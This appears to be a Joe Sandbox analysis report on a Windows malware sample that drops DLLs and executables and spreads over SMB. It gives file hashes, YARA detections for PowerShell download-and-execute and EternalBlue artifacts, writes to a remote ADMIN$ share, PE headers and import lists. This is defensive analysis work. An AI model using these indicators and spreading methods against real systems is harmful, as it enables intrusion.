Joe Sandbox View:	Filename: 4xHN38uqxB.exe, Detection: malicious, Browse Filename: UO2z4n1Sxx.exe, Detection: malicious, Browse Filename: 4xHN38uqxB.exe, Detection: malicious, Browse Filename: spread.exe, Detection: malicious, Browse Filename: lq9ZRLjglJ.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, Detection: malicious, Browse Filename: t5UnDIIByu.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~............b......b..<....b.....)^......................................... ...... ......%...... ......Rich............PE..L......\............................Y.............@.......................................@.............................4......<.......x............................n..T...........................(...@...............\...L... ....................text...T........................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc........... ...n..............@..B................................................................................................................................................................................................................................................

C:\ProgramData\X64.dll

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87552
Entropy (8bit):	5.83584186360205
Encrypted:	false
SSDEEP:	1536:lvAN3Gvo0Ks2/nq2e2+KkFsbUEgfazCa/2+T6CXO7iPGzvsWwdc9dlEH0cnacCBc:lvAN3R1Xfq26KkFsb36uCa/2+T6CXO7/
MD5:	F51B8ACAD4EEFC1E13E6577D966AF9A2
SHA1:	55F394DEF20BB9DEAD3CDC8565068418007E0B14
SHA-256:	7D72C71DF2C2A21C5FE01A3080031646F891A79B32DF3EC0EB1C75652390473A
SHA-512:	258511BCB2E00613D224A615ED11FD4C0957390E16BAA265C72AB1CB278A95AC027232576FF599D095837557966DB90962988EA7C8A0A74F222FE52E1CD98C7C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\ProgramData\X64.dll, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........EM..+...+...+.(z....+.(z....+.(z....+...(...+.......+.../...+.A.....+...*...+..."...+.......+...)...+.Rich..+.................PE..d.....B^.........." ......................................................................`.................................................LC..d............p......................`5..8............................5...............................................text... ........................... ..`.rdata..............................@..@.data........P.......2..............@....pdata.......p.......<..............@..@.gfids...............J..............@..@.rsrc................L..............@..@.reloc...............N..............@..B........................................................................................................................................................................................................

C:\ProgramData\X86.dll

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	6.287085522216627
Encrypted:	false
SSDEEP:	1536:q53/kKf0gogqox9ZiP0ZNLhezq4KQ/frjxsWqdQcdwP7pio97jPHXt:i+q9Ecc5KK3+/wP7piOjfd
MD5:	41E7F637504AF4266ADEDF3201FAE4C9
SHA1:	BA3C32C866735B5B4454763A2FFFB8C3694FB29E
SHA-256:	CB3688D56C08DF3CFA826A29E3FCA6BEEEEB1C370022A827EA1F7B366CBA05AC
SHA-512:	BCDD4E2209E0AC0F6977D2FBB443D8B44ECBD0B9EA918B4E1E837B3973933BF621782D6AE3179EDF2DD50A8D81CD85271AF59450AB0DC713255EE9B5A614438B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\ProgramData\X86.dll, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5...5...5...^..<...^..A...^..-.......$....... .......:...<.n.<...5...T......6......4......4...Rich5...........PE..L.....B^...........!................u........................................p............@.....................................d....P.......................`......0...8...........................h...@...............D............................text.............................. ..`.rdata...Z.......\..................@..@.data........ ......................@....gfids.......@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\spread.txt

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9402368
Entropy (8bit):	7.593747729616686
Encrypted:	false
SSDEEP:	196608:rhHMBGC3PtXtT+Was8owq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G0RwuwasMdJOnZKVSaaNZOn
MD5:	2CF24966A6AAD7B6ECFFE04A20EAF3DD
SHA1:	E50A4184953FAEEC7E40BB33F52C08D7F22A2519
SHA-256:	01C9940B468CE2A58F2BC52F5C8B7D0310451C994D798879FF653D92FBAF8719
SHA-512:	5E4EDA6D61438E46C5E93B994DCDA0CDDCB24A0F19529605715F74C91A9AD0CF30FD592ABA8111D2AAAE8C340F6B2860564F6B35E871DF3F362AFB48AEA094F1
Malicious:	true
Yara Hits:	Rule: INDICATOR_TOOL_EXP_EternalBlue, Description: Detects Windows executables containing EternalBlue explitation artifacts, Source: C:\ProgramData\spread.txt, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........S;...;...;.... (.'.... *..... +.........?.......9...2.].:...2.Z.6...2.J.....;........... .......................7.....&.:...;.N.:.......:...Rich;...................PE..L....L.^..................+..vd...............+...@..........................P............@.................................@n5......p9...S.................. ..h#.. .1.......................1.....@.1.@.............+..............................text.....+.......+................. ..`.rdata..F.....+.. ....+.............@..@.data....D....5.......5.............@....gfids...<....7..>...h6.............@..@.giats.......P9.......8.............@..@.tls.........`9.......8.............@....rsrc.....S..p9...S...8.............@..@.reloc..h#... ...$...T..............@..B........................................................................................................................................

C:\ProgramData\spread.txt:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\syabcd.exe

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1361920
Entropy (8bit):	7.931670167304856
Encrypted:	false
SSDEEP:	24576:1/npaXod6XGw5TbmnENsnYp5g19o+Ng4ucu3rY5r6y9ol4qmsPRjSMbIFbnNW2:Jdrn/nY/gvRN1S3rtos5jSMbOb0
MD5:	23D84A7ED2E8E76D0A13197B74913654
SHA1:	23D04BA674BAFBAD225243DC81CE7ECCD744A35A
SHA-256:	AC530D542A755ECCE6A656EA6309717EC222C34D7E34C61792F3B350A8A29301
SHA-512:	AA6B0100D477214D550B6498787190FC1A8FAFA7C478F9595D45E4E76ECE9888B84DCCA26696500D5710A9D1ACAE4810F2606D8962C46D31F2BDFCDD27BD675C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Joe Sandbox View:	Filename: 4xHN38uqxB.exe, Detection: malicious, Browse Filename: UO2z4n1Sxx.exe, Detection: malicious, Browse Filename: 4xHN38uqxB.exe, Detection: malicious, Browse Filename: spread.exe, Detection: malicious, Browse Filename: lq9ZRLjglJ.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, Detection: malicious, Browse Filename: t5UnDIIByu.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........*...Kd..Kd..Kd.[...Kd.[..\Kd.[...Kd.q...Kd...g..Kd...a.Kd...`..Kd.x.`..Kd.2....Kd..Ke.Jd.}.`..Id.x.m.bKd.}.g..Kd.}....Kd.x.f..Kd.Rich.Kd.........................PE..d...z=5^.........."..............`O..+d..pO....@.............................@d...........`..................................................1d......0d.......`..............3d.............................(.d.(...l.d.............................................UPX0.....`O.............................UPX1.........pO.....................@....rsrc........0d.....................@......................................................................................................................................................................................................................................................................................................................3.91.UPX!.$..

\Device\Mup\192.168.2.5\ADMIN$\spread.txt

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:OWn:OWn
MD5:	202CB962AC59075B964B07152D234B70
SHA1:	40BD001563085FC35165329EA1FF5C5ECBDBBEEF
SHA-256:	A665A45920422F9D417E4867EFDC4FB8A04A1F3FFF1FA07E998E86F7F7A27AE3
SHA-512:	3C9909AFEC25354D551DAE21590BB26E38D53F2173B8D3DC3EEE4C047E7AB1C1EB8B85103E3BE7BA613B31BB5C9C36214DC9F14A42FD7A2FDB84856BCA5C44C2
Malicious:	false
Preview:	123

\Device\Mup\192.168.2.5\PIPE\srvsvc

Download File

Process:	C:\Users\user\Desktop\x00zm3KVwb.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.25236229454546
Encrypted:	false
SSDEEP:	3:rmHD/tH//llleYhtC4d1ydYhtq5kZty:rmHurYty
MD5:	1FF3DE735A87D719B35ED6D00689168C
SHA1:	6711956511BAB8C677A411EA33830E1A2139AC84
SHA-256:	36A192FDB029E0357EB75DF25BF3C2EF035DBCBB9B811527B7276C5CA6D2177E
SHA-512:	1160A3480E574315832F8A9B60D0A6293A14D3A259EA3B6E220EEC46D72504C66AF2712A7CEF030F0E0F548845FD1AFC1FEC43985FE56614A6AF27FB75C3BA57
Malicious:	false
Preview:	........t........................O2Kp....xZG.n......]..........+.H`.........O2Kp....xZG.n.....,..l..@E............

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.593747729616686
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	x00zm3KVwb.exe
File size:	9'402'368 bytes
MD5:	2cf24966a6aad7b6ecffe04a20eaf3dd
SHA1:	e50a4184953faeec7e40bb33f52c08d7f22a2519
SHA256:	01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719
SHA512:	5e4eda6d61438e46c5e93b994dcda0cddcb24a0f19529605715f74c91a9ad0cf30fd592aba8111d2aaae8c340f6b2860564f6b35e871df3f362afb48aea094f1
SSDEEP:	196608:rhHMBGC3PtXtT+Was8owq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G0RwuwasMdJOnZKVSaaNZOn
TLSH:	2C96E022BDD18577C66303327D5DF23972EEB5741B3581C763981F2D2A702E26A3922B
File Content Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........S;...;...;.... (.'.... *...... +.........?.......9...2.].:...2.Z.6...2.J.....;........... .......................7.....&.:..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x5fb3f6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5EE34C9B [Fri Jun 12 09:36:27 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	59bd1de5370a3a1763ca4ab2cd4ba57f

Entrypoint Preview

Instruction
call 00007FB88CE6D272h
jmp 00007FB88CE6C491h
jmp dword ptr [006BAEF0h]
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FB88CE6BCD9h
jmp 00007FB88CE6C610h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007FB88CE6BCC8h
jmp 00007FB88CE6C5FFh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0075CE68h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0075CE68h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp

Rich Headers

Programming Language:

[C++] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x356e40	0x1e0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x397000	0x53a990	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8d2000	0x32368	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x318720	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31879c	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x318740	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2ba000	0xef0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2b8c86	0x2b8e00	f9597f1d3d939335bd87c87d8752369b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2ba000	0xa1e46	0xa2000	bba5eb18f101254c5ef820eaa4e5a877	False	0.3060845269097222	data	5.3811984810843025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x35c000	0x1441c	0xb600	cde0b9004f1f06d7739c92b6be079f1a	False	0.23519059065934067	data	5.025191306115406	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids	0x371000	0x23ce0	0x23e00	bb333be54097aafebd06fbec8fad0335	False	0.2889672256097561	data	4.237634463943425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.giats	0x395000	0x1c	0x200	294640d4ba77e75f3b3a4d4856b39aa5	False	0.0625	data	0.26789873110924267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x396000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x397000	0x53a990	0x53aa00	34f6a09b2c01cbed4997af05ee26b95f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8d2000	0x32368	0x32400	9344edd30879268bce357a3a276efa78	False	0.4437431980721393	data	6.53103798247427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
LNK	0x874428	0x5d332	data	Chinese	China	0.6427179328663561
SMB	0x563fa0	0x310484	data	Chinese	China	0.8830423355102539
X64	0x3971a0	0x14c800	data	Chinese	China	0.9896430969238281
X86	0x4e39a0	0x80600	data	Chinese	China	0.9822164830817917
RT_MANIFEST	0x8d1760	0x22f	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (499), with CRLF line terminators	English	United States	0.5295169946332737

Imports

DLL	Import
KERNEL32.dll	GetStartupInfoW, QueryPerformanceCounter, InitializeSListHead, WaitForMultipleObjectsEx, UnregisterWaitEx, QueryDepthSList, InterlockedPopEntrySList, ReleaseSemaphore, SetProcessAffinityMask, GetVersionExW, GetThreadTimes, UnregisterWait, RegisterWaitForSingleObject, SetThreadAffinityMask, GetProcessAffinityMask, GetNumaHighestNodeNumber, DeleteTimerQueueTimer, ChangeTimerQueueTimer, CreateTimerQueueTimer, GetLogicalProcessorInformation, GetThreadPriority, SwitchToThread, SignalObjectAndWait, CreateTimerQueue, WriteConsoleW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetConsoleCtrlHandler, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, IsValidCodePage, IsDebuggerPresent, FindFirstFileExW, FindFirstFileExA, GetConsoleCP, GetDriveTypeW, GetTimeZoneInformation, DeleteFileW, ReadConsoleW, GetConsoleMode, SetFilePointerEx, EnumSystemLocalesW, IsValidLocale, GetTimeFormatW, GetDateFormatW, GetStdHandle, GetCommandLineW, GetCommandLineA, HeapQueryInformation, GetFileType, SetStdHandle, GetFullPathNameW, VirtualQuery, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, InterlockedFlushSList, InterlockedPushEntrySList, RtlUnwind, GetStringTypeW, LCMapStringW, TryEnterCriticalSection, GetNativeSystemInfo, GetExitCodeThread, QueryPerformanceFrequency, FormatMessageW, OutputDebugStringW, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, CreateEventW, WaitForSingleObjectEx, LocalLock, LocalUnlock, GetUserDefaultLCID, ReplaceFileA, GetDiskFreeSpaceA, SearchPathA, GetProfileIntA, GetTempFileNameA, VerifyVersionInfoA, VerSetConditionMask, GetWindowsDirectoryA, FindResourceExW, lstrcpyA, GetACP, GetCurrentDirectoryA, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, GetCPInfo, GetOEMCP, VirtualProtect, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, CompareStringW, GetCurrentThread, GlobalFindAtomA, lstrcmpW, GlobalDeleteAtom, FreeResource, GetSystemDirectoryW, EncodePointer, ResumeThread, SuspendThread, SetThreadPriority, GlobalAddAtomA, GlobalFlags, SetErrorMode, LocalReAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, CompareStringA, GetAtomNameA, GlobalGetAtomNameA, lstrcmpA, SystemTimeToFileTime, SetFileTime, LocalFileTimeToFileTime, GetFileTime, GetFileSizeEx, GetFileAttributesExA, GetStringTypeExA, GetThreadLocale, GetVolumeInformationA, MoveFileA, GetShortPathNameA, LoadLibraryExA, GetModuleHandleW, GetModuleFileNameW, DuplicateHandle, UnlockFile, SetEndOfFile, LockFile, GetFullPathNameA, FlushFileBuffers, FileTimeToLocalFileTime, MulDiv, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, FormatMessageA, LocalAlloc, LoadLibraryExW, SetLastError, GetSystemDefaultLangID, CreateMutexA, ExitProcess, GetCurrentProcess, OutputDebugStringA, TerminateProcess, GlobalMemoryStatusEx, GetVersionExA, LoadLibraryW, Process32Next, Process32First, CreateProcessA, GetStartupInfoA, CreatePipe, FreeLibrary, FindResourceW, OpenProcess, LoadLibraryA, GetProcAddress, GetProcessHeap, HeapDestroy, DecodePointer, HeapAlloc, RaiseException, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, HeapFree, LocalFree, InterlockedDecrement, GetComputerNameA, Module32Next, Module32First, MultiByteToWideChar, GetCurrentProcessId, CreateToolhelp32Snapshot, WaitNamedPipeA, GetCurrentThreadId, DeleteCriticalSection, GetLastError, TerminateThread, WaitForMultipleObjects, SetEvent, WaitForSingleObject, ResetEvent, CreateEventA, InitializeCriticalSection, InterlockedIncrement, LeaveCriticalSection, EnterCriticalSection, GetTickCount, GetTempPathA, GetModuleHandleA, FindResourceA, LoadResource, LockResource, SizeofResource, VirtualAlloc, VirtualFree, MoveFileExA, CreateThread, GetDriveTypeA, GetLogicalDriveStringsA, GetDiskFreeSpaceExA, GetSystemInfo, GetProcessTimes, GetExitCodeProcess, GetSystemTimeAsFileTime, WinExec, FindClose, FindNextFileA, Sleep, FindFirstFileA, CopyFileA, GetModuleFileNameA, GetFileAttributesA, DeleteFileA, SetFileAttributesA, lstrcmpiA, WriteFile, SetFilePointer, ReadFile, CloseHandle, GetFileSize, CreateFileA, WideCharToMultiByte, FindNextFileW, RtlCaptureStackBackTrace
USER32.dll	LoadImageW, TrackMouseEvent, InvalidateRect, KillTimer, SetTimer, DeleteMenu, SetCursor, ShowOwnedPopups, MapDialogRect, GetAsyncKeyState, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, OffsetRect, SetRectEmpty, CopyImage, SystemParametersInfoA, GetMenuItemInfoA, DestroyMenu, IntersectRect, InflateRect, LoadBitmapW, SetMenuItemInfoA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, EnableMenuItem, CheckMenuItem, PostQuitMessage, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, GetTopWindow, GetClassLongA, EqualRect, CopyRect, MapWindowPoints, AdjustWindowRectEx, GetClientRect, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, ScrollWindow, RedrawWindow, SetForegroundWindow, SetActiveWindow, UpdateWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, IsIconic, EndDeferWindowPos, DeferWindowPos, DrawStateA, DrawEdge, DrawFrameControl, IsZoomed, LoadMenuW, GetSystemMenu, wsprintfW, wsprintfA, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, DestroyWindow, IsChild, IsMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, BringWindowToTop, DefWindowProcA, GetMessageTime, GetMessagePos, GetDialogBaseUnits, FillRect, ScreenToClient, EndPaint, BeginPaint, GetWindowDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, GetNextDlgGroupItem, SetCapture, ReleaseCapture, WindowFromPoint, DrawFocusRect, IsRectEmpty, LoadImageA, DrawIconEx, GetIconInfo, MessageBeep, EnableScrollBar, HideCaret, InvertRect, LoadCursorW, NotifyWinEvent, CreatePopupMenu, EmptyClipboard, GetMenuDefaultItem, MapVirtualKeyA, GetKeyNameTextA, SetLayeredWindowAttributes, EnumDisplayMonitors, SetClassLongA, SetWindowRgn, SetParent, UnregisterClassA, FindWindowA, GetWindowThreadProcessId, GetLastInputInfo, GetForegroundWindow, SendMessageA, PostMessageA, GetDesktopWindow, GetMenuStringA, GetMenuState, GetSubMenu, GetMenuItemID, GetMenuItemCount, InsertMenuA, AppendMenuA, RemoveMenu, CharUpperA, GetSystemMetrics, UnhookWindowsHookEx, GetWindowTextA, GetWindowTextLengthA, GetDC, ReleaseDC, GetSysColor, GetSysColorBrush, LoadCursorA, EnableWindow, IsWindowEnabled, MessageBoxA, GetWindowLongA, GetParent, GetLastActivePopup, SetFocus, SetScrollPos, GetScrollPos, GetWindow, IsWindow, ShowWindow, MoveWindow, SetWindowPos, GetDlgItem, SetDlgItemInt, GetDlgItemInt, SetDlgItemTextA, GetDlgItemTextA, CheckDlgButton, CheckRadioButton, IsDlgButtonChecked, SendDlgItemMessageA, GetDlgCtrlID, GetFocus, ScrollWindowEx, SetWindowTextA, SetWindowLongA, IsDialogMessageA, GetWindowRect, ClientToScreen, PtInRect, GetClassNameA, RealChildWindowFromPoint, DestroyIcon, GetMessageA, GetWindowRgn, TranslateMessage, DispatchMessageA, PeekMessageA, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, SetCursorPos, CopyIcon, FrameRect, DrawIcon, OpenClipboard, CloseClipboard, SetClipboardData, RegisterWindowMessageA, GetCursorPos, SetWindowsHookExA, CallNextHookEx, UnionRect, UpdateLayeredWindow, MonitorFromPoint, LoadAcceleratorsA, TranslateAcceleratorA, LoadMenuA, InsertMenuItemA, GetMenuBarInfo, UnpackDDElParam, ReuseDDElParam, GetComboBoxInfo, PostThreadMessageA, WaitMessage, GetKeyboardLayout, IsCharLowerA, MapVirtualKeyExA, GetKeyboardState, ToAsciiEx, LoadAcceleratorsW, CreateAcceleratorTableA, DestroyAcceleratorTable, CopyAcceleratorTableA, SetRect, LockWindowUpdate, SetMenuDefaultItem, GetDoubleClickTime, ModifyMenuA, RegisterClipboardFormatA, CharUpperBuffA, IsClipboardFormatAvailable, GetUpdateRect, EnumChildWindows, DrawMenuBar, DefFrameProcA, DefMDIChildProcA, TranslateMDISysAccel, SubtractRect, SendNotifyMessageA, MonitorFromRect, InSendMessage, CreateMenu, WindowFromDC, GetTabbedTextExtentW, GetTabbedTextExtentA, GetDCEx, DestroyCursor, CallWindowProcA
GDI32.dll	IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextColor, SetTextAlign, SetTextJustification, PlayMetaFileRecord, EnumMetaFile, SetWorldTransform, SetColorAdjustment, StartDocA, ArcTo, PolyDraw, SelectClipPath, SetArcDirection, ExtCreatePen, GetObjectA, MoveToEx, TextOutA, ExtTextOutA, PolyBezierTo, PolylineTo, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CombineRgn, CreateFontIndirectA, CreateRectRgnIndirect, GetMapMode, PatBlt, SetRectRgn, DPtoLP, GetTextExtentPoint32A, GetWindowExtEx, EnumFontFamiliesExA, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, GetBkColor, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateEllipticRgn, Ellipse, GetTextColor, CreatePolygonRgn, Polygon, Polyline, CreateRoundRectRgn, LPtoDP, Rectangle, GetRgnBox, OffsetRgn, GetCurrentObject, CreateFontA, GetCharWidthA, StretchDIBits, RoundRect, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, ExtFloodFill, SetPaletteEntries, SetPixelV, GetWindowOrgEx, GetViewportOrgEx, CloseMetaFile, CreateMetaFileA, DeleteMetaFile, EndDoc, StartPage, EndPage, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, GetTextExtentPointA, GetTextExtentPoint32W, GetTextFaceA, GetViewportExtEx, GetStockObject, GetPixel, GetObjectType, GetCurrentPositionEx, GetClipRgn, GetClipBox, ExcludeClipRect, Escape, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateDIBPatternBrushPt, CreateCompatibleDC, CreateBitmap, BitBlt, DeleteObject, GetDeviceCaps, CreateDCA, GetTextMetricsA, ModifyWorldTransform, CopyMetaFileA
MSIMG32.dll	TransparentBlt, AlphaBlend
WINSPOOL.DRV	ClosePrinter, OpenPrinterA, DocumentPropertiesA, GetJobA
